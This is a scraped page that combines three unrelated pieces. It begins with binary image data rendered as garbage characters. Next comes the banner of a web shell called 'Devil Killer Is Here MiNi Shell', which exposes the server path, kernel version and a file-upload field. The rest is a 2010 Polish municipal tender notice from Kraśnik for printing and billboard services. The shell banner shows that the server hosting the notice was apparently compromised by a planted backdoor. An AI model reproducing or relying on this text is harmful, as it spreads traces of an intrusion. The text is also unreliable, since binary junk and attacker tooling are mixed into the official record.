JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100312/55587-N-2010.html

<p class="kh_header"><b>Kraśnik: Usługi promocyjne związane z  realizacją projektu Kształcić się ustawicznie</b><br>
<b>Numer ogłoszenia: 55587 - 2010; data zamieszczenia: 12.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Kraśnika , ul. Lubelska 84, 23-200 Kraśnik, woj. lubelskie, tel. 081 8251540, faks 081 8252709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krasnik.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi promocyjne związane z  realizacją projektu Kształcić się ustawicznie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług związanych z przygotowaniem i dostarczeniem materiałów promocyjnych związanych z  realizacją projektu Kształcić się ustawicznie.  Zamówienie polega na przygotowaniu,  opracowaniu graficznym, wydruku bądź wykonaniu  oraz dystrybucji materiałów promocyjnych na potrzeby realizacji projektu. Materiały będące przedmiotem zamówienia to:

Zadanie 1. Opracowanie, wydruk i dystrybucja ulotek promocyjnych w ilości 5000 sztuk,
Zadanie 2.  Opracowanie, wydruk i dystrybucja plakatów w ilości 5000 sztuk,
Zadanie 3. Opracowanie graficzne oraz wykonanie 2 roll-upów wizualizacyjnych,
Zadanie 4. Opracowanie graficzne (skład, korekta) i druk folderu promocyjnego w ilości 5000 sztuk,
Zadanie 5. Przygotowanie do wydruku (prac konkursowych ) i wykonanie 10 sztuk billboardów oraz ich 2 miesięczna ekspozycja na terenie Miasta Kraśnik.
Zadanie 6.  Przygotowanie do wydruku (prac konkursowych ) i wykonanie 10 sztuk citylightów oraz ich 2 miesięczna ekspozycja na terenie Miasta Kraśnik.
Zadanie 7. Wykonanie i dostawa 80 zestawów materiałów Formy Kształcenia Ustawicznego.

Wymienione materiały promocyjne powinny spełniać wymogi techniczne jak poniżej:
1. Szczegółowy opis przedmiotu zamówienia dla Zadania 1. Opracowanie, wydruk i dystrybucja ulotek promocyjnych w ilości 5000 sztuk,

1.1. Opracowanie, wydruk i dystrybucja ulotek promocyjnych:
-  format A5
- liczba projektów graficznych do wykonania - 2 wzory graficzne,
- liczba przedstawionych projektów do wyboru każdego z wzorów graficznych - min 3,
- ulotka łamana na 3 części,
- kolor 4+4 w skali CMYK,
- papier kreda błysk 170 g/m2, 
- lakierowane lakierem UV.
- Wykonawca wykona projekty graficzne w terminie 2 dni od otrzymania wytycznych od Zamawiającego.
- Wykonawca dostarczy Zamawiającemu  przedmiot umowy  w terminie 5 dni od zatwierdzenia projektów graficznych do druku.
-  Wykonawca odpowiada za dystrybucję ulotek w miejscach wskazanych przez Zamawiającego na terenie Miasta Kraśnik (jednocześnie w 3 punktach - ulotki rozdawane osobiście) w miesiącach marzec - czerwiec 2010 roku.
Termin realizacji: 15 dni roboczych 
Przed skierowaniem materiału do druku, konieczne jest uzyskanie akceptacji przez Zamawiającego dla przedstawionego projektu graficznego. 
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby Miasta Kraśnik oraz wniesienie do miejsca w siedzibie Urzędu wskazanego przez Zamawiającego. 

2. Szczegółowy opis przedmiotu zamówienia dla Zadania 2. Opracowanie, wydruk i dystrybucja plakatów w ilości 5000 sztuk
2.1. Opracowanie, wydruk i dystrybucja plakatów :
- format  A1 
- ilość - 5000 sztuk
- liczba projektów graficznych do wykonania - 2 wzory graficzne
- liczba przedstawionych projektów do wyboru każdego z wzorów graficznych - min 3.
- pełny kolor
- rodzaj papieru - papier kreda błysk, grubość  170 b/m2
- lakierowanie lakierem offsetowym
- Wykonawca wykona projekty graficzne w terminie 2 dni od otrzymania wytycznych od Zamawiającego.
- Wykonawca dostarczy Zamawiającemu  przedmiot umowy  w terminie 5 dni od zatwierdzenia projektów graficznych do druku.

Termin realizacji: 15 dni roboczych. 
Przed skierowaniem materiału do druku, konieczne jest uzyskanie akceptacji przez Zamawiającego dla przedstawionego projektu graficznego.
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby Miasta Kraśnik oraz wniesienie do miejsca w siedzibie Urzędu wskazanego przez Zamawiającego. 

3. Szczegółowy opis przedmiotu zamówienia Zadania 3. Opracowanie graficzne oraz wykonanie 2 roll-upów wizualizacyjnych
3.1. Opracowanie graficzne oraz wykonanie 2 roll-upów wizualizacyjnych
opracowanie min. 3 projektów graficznych roll-upu,
- wykonanie 2 roll-upów na podstawie projektu zatwierdzonego przez Zamawiającego o wymiarach 150 cm szerokości i 200 cm wysokości,
- wysokiej jakości wydruk w rozdzielczości 1440dpi.
- każdy z roll-upów powinien zawierać:
-   konstrukcję aluminiową z mechanizmem rolującym
- baner wykonany z tkaniny powlekanej pcv
-  górną listwę mocującą, 
- kasetka, osłony boczne i 3 częściowy drążek podpierający (grubość drążka min. 1,2 mm)
wykonane ze stopu aluminium, 
- górna listwa zaciskowa,
-  futerał - torbę z trzema uchwytami, 

Termin realizacji: 6 dni roboczych. 
Przed skierowaniem materiału do druku, konieczne jest uzyskanie akceptacji przez Zamawiającego dla przedstawionego projektu graficznego. 
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby Miasta Kraśnik oraz wniesienie do miejsca w siedzibie Urzędu wskazanego przez Zamawiającego.

4. Szczegółowy opis przedmiotu zamówienia Zadania 4. Opracowanie graficzne (skład, korekta) i druk folderu promocyjnego
4.1. Opracowanie graficzne (skład, korekta) i druk folderu promocyjnego:
- opracowanie min. 2 projektów graficznych folderu promocyjnego do wyboru przez Zamawiającego
- wydruk folderu w ilości 5000 sztuk w oparciu o projekt wybrany przez Zamawiającego,
- w/w foldery powinny spełniać następujące wymagania:
- Wykonanie wysokiej jakości projektu graficznego obejmującego pełną obróbkę zdjęć, 
- przygotowanie do druku i druk folderu, 
- format A4 składany na trzy części,
- kolory 4+4 w skali CMYK, 
- papier kreda błysk 300 g/m2, 
-uszlachetnienie w postaci foliowania folią błyszczącą 

Termin realizacji: 15 dni roboczych. 
Przed skierowaniem materiału do druku, konieczne jest uzyskanie akceptacji przez Zamawiającego dla przedstawionego projektu graficznego. 
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby Miasta Kraśnik oraz wniesienie do miejsca w siedzibie Urzędu wskazanego przez Zamawiającego.
5. Szczegółowy opis przedmiotu zamówienia Zadania 5. Przygotowanie do wydruku (prac konkursowych) i wykonanie 10 sztuk billboardów oraz ich 2 miesięczna ekspozycja na terenie Miasta Kraśnik.
5.1. Przygotowanie do wydruku (prac konkursowych) i wykonanie 10 sztuk billboardów oraz ich 2 miesięczna ekspozycja na terenie Miasta Kraśnik:

- przygotowanie do wydruku 10 sztuk bilbordów wg. projektów przekazanych przez Zamawiającego, wybranych w wyniku konkursu ogłoszonego przez Zamawiającego dla beneficjentów projektu,

- przedstawienie Zamawiającemu projektu billboardów w formie pomniejszonego wydruku w formacie A4 w skali 1:1,
- wydrukowanie 10 sztuk billboardów o wymiarach 504 x 238 cm, na nośnikach wielkoformatowych, 
- zapewnienie lokalizacji dla 10 sztuk billboardów w miejscach umożliwiających ich dobrą widoczność dla jak największej liczby mieszkańców tj. na elewacjach budynków bądź na samodzielnych konstrukcjach widocznych z pasów drogowych głównych dróg w Mieście Kraśnik, w tym:
a) 3 z nich powinny być umieszczone w miejscach dobrze widocznych z drogi powiatowej - ul. Krasińskiego,
b) 2 z nich powinny być umieszczone w miejscach dobrze widocznych z drogi powiatowej - ul. al. Niepodległości,
c) 1 z nich powinno być umieszczone w miejscach dobrze widocznych z drogi wojewódzkiej - ul. Urzędowskiej,
d) 1 z nich powinno być umieszczone w miejscach dobrze widocznych z dróg miejskich w rejonie Piaski,
e)  1 z nich powinno być umieszczone w miejscach dobrze widocznych z drogi powiatowej -  ul. Chopina,
f) 1 z nich powinno być umieszczone w miejscach dobrze widocznych z drogi powiatowej -  ul. al. Tysiąclecia
g) 1 z nich powinno być umieszczone w miejscach dobrze widocznych z drogi miejskiej -  ul. Koszarowej,
- montaż 10 billboardów w miejscach określonych w ofercie
- ekspozycja 10 billboardów przez dwa miesiące w 2010 r. (miesiące: maj i czerwiec). 
- demontaż billboardów po upływie wymaganego okresu ekspozycji.
Termin realizacji: 15 dni roboczych. 
Przed skierowaniem materiału do druku, konieczne jest uzyskanie akceptacji przez Zamawiającego dla przedstawionego projektu graficznego. 

6. Szczegółowy opis przedmiotu zamówienia Zadania 6. Przygotowanie do wydruku (prac konkursowych ) i wykonanie 10 sztuk citilightów oraz ich 2 miesięczna ekspozycja na terenie Miasta Kraśnik .
6.1. Przygotowanie do wydruku (prac konkursowych ) i wykonanie 10 sztuk citilightów oraz ich 2 miesięczna ekspozycja na terenie Miasta Kraśnik:
- przygotowanie do wydruku 10 sztuk citilightów wg. projektów przekazanych przez Zamawiającego, wybranych w wyniku konkursu ogłoszonego przez Zamawiającego dla beneficjentów projektu,
- przedstawienie Zamawiającemu projektu citilightów w formie pomniejszonego wydruku w formacie A4 w skali 1:1,
- wydrukowanie 10 sztuk citilightów o wymiarach 1,2 x 1,8 m, materiał, na jakim należy wykonać wydruk do rozwieszenia na powierzchniach to: winyl lub winyl backlight lub winyl frontlight lub siatka lub siatka z przeplotem. Materiał musi być dostosowany do wielkości i rodzaju nośnika.
- zapewnienie lokalizacji dla 10 sztuk citilightów na terenie Miasta Kraśnik w oszklonych i zamykanych gablotach umieszczonych w wiatach przystankowych bądź samodzielnych konstrukcjach.
- montaż 10 citilightów w miejscach określonych w ofercie.
- ekspozycja 10 citilightów przez dwa miesiące 2010 r. (miesiące maj i czerwiec).
- demontaż citilightów po upływie wymaganego okresu ekspozycji.
Termin realizacji: 15 dni roboczych. 
Przed skierowaniem materiału do druku, konieczne jest uzyskanie akceptacji przez Zamawiającego dla przedstawionego projektu graficznego. 

7. Szczegółowy opis przedmiotu zamówienia Zadania 7. Wykonanie i dostawa 80 zestawów materiałów promujących Formy Kształcenia Ustawicznego.
7.1. Wykonanie i dostawa 80 zestawów materiałów promujących Formy Kształcenia Ustawicznego:
- zaprojektowanie i dostawa materiałów promocyjnych dla uczestników konkursu w formie:
1. elementy odblaskowe - sztuk 80, oznakowane zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach programu operacyjnego Kapitał Ludzki oraz tytułem projektu Kształcić się ustawicznie, w formie zaproponowanej przez Wykonawcę do akceptacji i wyboru przez zamawiającego jednego rodzaju proponowanego elementu odblaskowego,
2. Czapki z daszkiem - sztuk 80, kolor czerwony z napisem Kształcić się ustawicznie i logotypami zgodnie z Wytycznymi dotyczącymi oznakowania projektów, rozmiar 50,
3. torby na zakupy - sztuk 80, wykonane z materiału, usztywniane, oznakowane zgodnie z Wytycznymi dotyczącymi oznakowania i z tytułem projektu Kształcić się ustawicznie, propozycje wzornictwa, koloru i formatu zaproponowane przez Wykonawcę do akceptacji i wyboru jednego rodzaju przez Zamawiającego,
Termin realizacji: 15 dni roboczych. 
Przed skierowaniem materiału do druku, konieczne jest uzyskanie akceptacji przez Zamawiającego dla przedstawionego projektu graficznego. 
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby Miasta Kraśnik oraz wniesienie do miejsca w siedzibie Urzędu wskazanego przez Zamawiającego.
2. Wykonawca na wszystkich materiałach promocyjnych i informacyjnych zastosuje wszystkie logotypy wynikające z wytycznych Instytucji Wdrażającej zakresie obowiązków beneficjentów w zakresie prowadzenia działań informacyjnych i promocyjnych projektów współfinansowanych ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki (logotypy zostały określone w załączniku nr 6 do niniejszej SIWZ).
3. Wykonawca dostarczy Zamawiającemu projekty wszystkich materiałów promocyjnych i informacyjnych, wytworzonych w ramach realizacji zamówienia, w plikach źródłowych, w rozdzielczości umożliwiającej zamieszczenie plików na stronie internetowej Zamawiającego.
4. Wszelkie projekty, materiałów promocyjnych i informacyjnych, wytworzonych w ramach realizacji zamówienia, przesłane Zamawiającemu przez Wykonawcę do akceptacji, Zamawiający zaakceptuje w terminie do 5 dni roboczych. W powyższym terminie Zamawiający zawiadomi pisemnie Wykonawcę, który projekt przyjmuje lub o konieczności wniesienia poprawek do projektu.
5. Wszelkie poprawki lub sugestie Zamawiającego do projektów materiałów promocyjnych i informacyjnych, wytworzonych w ramach realizacji zamówienia, Wykonawca wykona w terminie do 5 dni roboczych. 
6. Treść i materiały niezbędne do opracowania materiałów promocyjnych zostaną każdorazowo określone przez Zamawiajacego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie w trybie zamówienia z wolnej ręki zamówień uzupełniających (art. 67 ust. 1 pkt. 6 ustawy PZP).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5, 79.34.10.00-6, 22.46.20.00-6, 79.82.25.00-7, 79.82.30.00-9, 22.00.00.00-0, 22.10.00.00-1, 22.85.20.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium w wysokości:
3 000 zł (słownie: trzy tysiące złotych), które może być wnoszone w:
	pieniądzu,
	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym 
	poręczeniach i gwarancjach bankowych,
	gwarancjach ubezpieczeniowych,
	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. z 2007r. Nr 42, poz. 275 z późn. zm.)

Za wyjątkiem wadium wniesionego w pieniądzu, wymagane jest dołączenie do oferty oryginału dokumentu wystawionego na rzecz zamawiającego. Dokumenty, o których mowa muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.

2.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy Ziemi Kraśnickiej w Kraśniku nr 10 8717 0009 2001 0000 0909 0013. 
3.	Jeżeli wadium zostanie wniesione w pieniądzu przelewem, wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. W tytule przelewu należy wpisać: wadium- 
Usługi promocyjne związane z  realizacją projektu Kształcić się ustawicznie.  
4.	Wadium musi być wniesione przed upływem terminu składania ofert, tj. do  19.03.2010 r. do godz. 11.00 (liczy się data wpływu środków na rachunek bankowy Zamawiającego
5.	Wykonawca, który nie wniósł wadium zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą.
6.	Wykonawcy, którzy wnieśli wadium nie stanowiące całości wymaganej kwoty lub, gdy forma jest niezgodna z rozdziałem XIII  pkt 1 SIWZ - są wykluczeni.
7.	   Zamawiający zwraca niezwłocznie wadium, jeżeli:
	po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy którego oferta została wybrana jako najkorzystniejsza,
	upłynął termin związania ofertą,
	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
	zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
8.	Z zastrzeżeniem pkt 9, Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
	który wycofał ofertę przed upływem terminu składania ofert,
	który został wykluczony z postępowania,
	którego oferta została odrzucona.
9.	Zamawiający zwraca wadium Wykonawcy którego oferta została wybrana jako najkorzystniejsza niezwłocznie po zawarciu umowy w sprawie zamówienia i wniesienia zabezpieczenia należytego wykonania umowy.
10.	Zamawiający żąda ponownego wniesienia wadium, które zwrócono Wykonawcy na podstawie art. 46 ust 1 ustawy Pzp, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca na wezwanie Zamawiającego nie uzupełni wymaganych dokumentów, oświadczeń lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn niezależnych od niego.
12.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
13.	Wykonawca traci wadium na rzecz zamawiającego, jeżeli:
	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
	nie wniesie zabezpieczenia należytego wykonania umowy,
	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku posiadania uprawnień niezbędnych do wykonania zamówienia należy przedłożyć aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, w zakresie koniecznym do wykonania zamówienia, wystawionego, nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena  wiedzy i doświadczenia Wykonawcy dokonana będzie z punktu widzenia możliwości realizacji zamówienia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie zgodnie ze wzorem stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie dysponowania potencjałem technicznym należy złożyć:
a)	specyfikację miejsc przeznaczonych na lokalizację billboardów - specyfikacja powinna zawierać usytuowanie 10 miejsc  wraz z ich opisem i fotografią
b)	oświadczenie właścicieli powierzchni reklamowych o udostępnieniu ich w okresie 2 miesięcy 2010 r (maj i czerwiec),
c)	specyfikację miejsc przeznaczonych na lokalizację citilightów - specyfikacja powinna zawierać usytuowanie 10 miejsc  wraz z ich opisem i fotografią
d)	oświadczenie właścicieli powierzchni reklamowych - zamykanych i oszklonych gablot na cele reklamowe w okresie 2 miesięcy 2010 r (maj i czerwiec),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena potencjału ekonomicznego Wykonawcy dokonana będzie z punktu widzenia możliwości realizacji zamówienia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie zgodnie ze wzorem stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

